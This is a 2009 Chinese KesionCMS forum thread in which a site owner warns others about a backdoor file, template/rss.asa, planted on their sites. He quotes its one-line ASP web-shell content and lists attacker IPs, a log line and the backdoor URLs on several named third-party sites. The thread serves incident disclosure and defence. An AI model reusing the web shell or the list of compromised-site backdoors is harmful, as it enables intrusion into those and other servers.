账号通
    

账号  

密码  

10127

查看

33

回复
主题:赶紧看看目录template下有无rss.asa [收藏主题] 转到:  
52niuren 当前离线

69

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:623 分
登录次数:75 次
注册时间:2009/8/20
最后登录:2010/11/11
52niuren 发表于:2009/9/30 9:00:00   | 显示全部帖子 查看该作者主题 楼主 

官方原谅下,早上发消息等了半天没等到人

 

貌似又出问题了。

早上查ftp查出一句话template/rss.asa

内容:image/<%execute request("#")%>1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111

 

上一次是9月12日出现过这个文件

 

用了上次hack搜索方法访问了一些网站的template/rss.asa,发现很多都中招了,官方http://www.fjzsjc.com/被人挂马了都,http://www.fjzsjc.com/template/rss.asa后门都还留着

 

看日记感觉是tag.asp这个文件出问题

 

------快快查下吧,各位,估计又有很多人的遭殃了----

 

 

 

 

 

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
52niuren 当前离线

69

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:623 分
登录次数:75 次
注册时间:2009/8/20
最后登录:2010/11/11
52niuren 发表于:2009/10/1 1:09:00   | 显示全部帖子 查看该作者主题 沙发 
做在线知识付费 选科汛云开店

个人采取的措施:

 

更新完后

Admin\Include\UpFileSave.asp这个暂时备份到本地,删除(感觉这个文件嫌疑最大)

在虚拟机控制面板将网站写权限暂时去掉,觉得他们貌似可以构造数据包将权限写进任意目录

 

将网站日记存档...

 

等待官方测试结果......

 

---------------------------------

To 挂马者:国庆,用得着这样庆祝吗?

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
52niuren 当前离线

69

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:623 分
登录次数:75 次
注册时间:2009/8/20
最后登录:2010/11/11
52niuren 发表于:2009/9/30 13:01:00   | 显示全部帖子 查看该作者主题 藤椅 
科汛智能建站系统

又看了下日记plus/tags.asp貌似可以排除

 

每次都是admin/include/upfilesave.asp POST后然后出了rss.asa

不知道是不是这个文件出问题了....

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
52niuren 当前离线

69

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:623 分
登录次数:75 次
注册时间:2009/8/20
最后登录:2010/11/11
52niuren 发表于:2009/9/30 10:19:00   | 显示全部帖子 查看该作者主题 板凳 

发几张图片为证吧,YY 他们应该是这几天先取得shell,为日后挂马做准备的

以下是在某站日记看到的

 

一下几张是上面那些站点,建立rss.asa时间的截图,貌似正马不停蹄的拿shell

 

 

 

 

 

下面是攻击者访问日记:

 

 

 

 

 

........

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
52niuren 当前离线

69

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:623 分
登录次数:75 次
注册时间:2009/8/20
最后登录:2010/11/11
52niuren 发表于:2009/9/30 9:59:00   | 显示全部帖子 查看该作者主题 报纸 
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
52niuren 当前离线

69

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:623 分
登录次数:75 次
注册时间:2009/8/20
最后登录:2010/11/11
52niuren 发表于:2009/9/30 9:56:00   | 显示全部帖子 查看该作者主题 地板 
科汛在线考试系统(NET)

给一生有你看得,本人对脚本有点兴趣,一下是早上搜索到的,估计远远超过这些

 

追一

挖掘:
http://www.ncstar.com.cn/template/rss.asa

攻击这的
ip:218.13.33.136 尝试注入
  222.245.208.83 访问后门 :湖南省怀化市 电信
  222.245.216.244 湖南省怀化市 电信

2009-09-28 17:28:51 W3SVC36 115.47.235.226 POST /Template/rss.asa - 80 - 222.245.216.244 - 200 0 0 348

--------
追二
http://www.szvup.com/template/rss.asa


---------
http://www.meirongdawang.com/template/rss.asa
http://www.meirongdawang.com/template/1.asp

----
http://www.fjzsjc.com/template/rss.asa

http://www.xccsw.cn/template/rss.asa

http://www.china-report.com.cn/template/rss.asa

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
52niuren 当前离线

69

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:623 分
登录次数:75 次
注册时间:2009/8/20
最后登录:2010/11/11
52niuren 发表于:2009/9/30 9:07:00   | 显示全部帖子 查看该作者主题 7楼 
科汛在线网校系统

plus/tags.asp 估计是这个有问题,偶正在找日记

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
<上一主题 | 下一主题 >
Powered By KesionCMS Version X1
厦门科汛软件有限公司 © 2006-2016 页面执行0.25781秒 powered by KesionCMS 9.0